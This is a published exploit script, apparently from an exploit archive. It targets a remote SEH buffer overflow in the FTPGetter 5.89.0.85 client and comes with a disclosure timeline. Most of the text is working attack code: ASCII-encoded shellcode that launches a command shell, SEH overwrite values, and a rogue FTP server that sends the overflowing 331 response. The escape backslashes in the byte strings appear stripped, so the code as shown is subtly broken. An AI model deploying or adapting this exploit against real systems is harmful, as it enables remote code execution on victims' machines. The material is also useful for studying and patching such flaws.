FTPGetter 5.89.0.85 Buffer Overflow
Posted on 19 July 2017
#!/usr/bin/python # Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow # Date: 07/14/2017 # Exploit Author: Paul Purcell # Contact: ptpxploit at gmail # Vendor Homepage: https://www.ftpgetter.com/ # Vulnerable Version Download: Available for 30 days here: (https://ufile.io/2celn) I can upload again upon request # Version: FTPGetter 5.89.0.85 (also works on earlier versions) # Tested on: Windows 10 Pro 1703 x64 # Youtube Demonstration of Exploit: https://www.youtube.com/watch?v=AuAiQwGP-ww # Category: Remote Code Execution # # Timeline: 05/25/16 Bug found # 05/31/16 Vender notified - no response # 07/15/16 Vender notified - no response # -------- Vender notified multiple times over a year, no response. # 07/14/17 Exploit Published # # Summary: There is a buffer overflow in the log viewer/parser of FTPGetter. When a malicious ftp server returns a long # 331 response, the overflow overwrites SEH produced is exploitable. There are many bad characters, so I had to ascii encode everything. # My PoC runs code to launch a command shell. Also note the time of day is displayed in the log viewer, which will # change the length of the buffer needed. Just adjust your sled accordingly. from socket import * #ascii encoded launch cmd.exe buf = "" buf += "x57x59x49x49x49x49x49x49x49x49x49x49x49" buf += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" buf += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" buf += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" buf += "x4bx4cx6bx58x4fx72x67x70x43x30x55x50x33" buf += "x50x4fx79x4ax45x44x71x4fx30x71x74x6cx4b" buf += "x70x50x34x70x4ex6bx61x42x54x4cx4cx4bx42" buf += "x72x47x64x4ex6bx64x32x44x68x36x6fx4cx77" buf += "x42x6ax46x46x30x31x4bx4fx4cx6cx57x4cx31" buf += "x71x63x4cx44x42x64x6cx35x70x7ax61x38x4f" buf += "x56x6dx55x51x6fx37x38x62x4cx32x61x42x52" buf += "x77x4cx4bx51x42x32x30x6ex6bx50x4ax77x4c" buf += "x4ex6bx42x6cx34x51x44x38x68x63x32x68x66" buf += "x61x58x51x62x71x6cx4bx76x39x35x70x35x51" buf += "x49x43x4ex6bx37x39x67x68x68x63x55x6ax72" buf += "x69x4cx4bx64x74x4ex6bx65x51x5ax76x35x61" buf += "x69x6fx4cx6cx6bx71x78x4fx54x4dx57x71x39" buf += "x57x46x58x79x70x51x65x4cx36x67x73x51x6d" buf += "x38x78x67x4bx73x4dx64x64x32x55x39x74x56" buf += "x38x4cx4bx62x78x54x64x37x71x79x43x75x36" buf += "x4ex6bx46x6cx42x6bx4ex6bx56x38x47x6cx46" buf += "x61x5ax73x6cx4bx45x54x4cx4bx33x31x48x50" buf += "x4cx49x73x74x44x64x44x64x33x6bx53x6bx50" buf += "x61x73x69x63x6ax62x71x59x6fx6bx50x53x6f" buf += "x51x4fx32x7ax4ex6bx72x32x7ax4bx4ex6dx31" buf += "x4dx52x4ax35x51x4cx4dx4cx45x38x32x67x70" buf += "x63x30x53x30x66x30x75x38x36x51x6ex6bx52" buf += "x4fx4fx77x39x6fx4bx65x4dx6bx6ax50x4fx45" buf += "x4fx52x30x56x42x48x6ex46x6fx65x6fx4dx6d" buf += "x4dx49x6fx7ax75x45x6cx73x36x51x6cx37x7a" buf += "x4bx30x39x6bx39x70x30x75x76x65x6dx6bx72" buf += "x67x32x33x52x52x62x4fx51x7ax75x50x76x33" buf += "x79x6fx4bx65x55x33x62x4dx72x44x34x6ex53" buf += "x55x43x48x61x75x57x70x41x41" #All the normal ways to jump back to code I control code were bad characters, so again had to ascii encode jmpback = "" jmpback += "x56x59x49x49x49x49x49x49x49x49x49x49x49" jmpback += "x49x49x49x49x49x37x51x5ax6ax41x58x50x30" jmpback += "x41x30x41x6bx41x41x51x32x41x42x32x42x42" jmpback += "x30x42x42x41x42x58x50x38x41x42x75x4ax49" jmpback += "x4ex6dx4dx6ex46x70x49x6ex6bx4fx4bx4fx49" jmpback += "x6fx6ax47x41x41" host = "0.0.0.0" port = 21 sled="NjoyUrShell!" fill="x41"*(480-len(buf)) nseh="x74x06x90x90" seh="xadx11x4dx00" prepesi="x58x58x58x8dx70x10x90x90" jnk="B"*400 sploit=(sled+buf+fill+nseh+seh+prepesi+jmpback+jnk) sock = socket(AF_INET, SOCK_STREAM) sock.bind((host, 21)) sock.listen(1) print "Anti-FtpGetter FTP Server Started!" print "Ready to pwn on port %d..." % port connect, hostip = sock.accept() print "Connection accepted from %s" % hostip[0] connect.send("220 Welcome to pwnServ, Serving sploit in 3..2..1.. ") connect.recv(64) # Receive USER print "Sending EViL 331 response" connect.send("331 "+sploit+" ") print "Here, have a handy dandy command shell!" connect.close() sock.close()
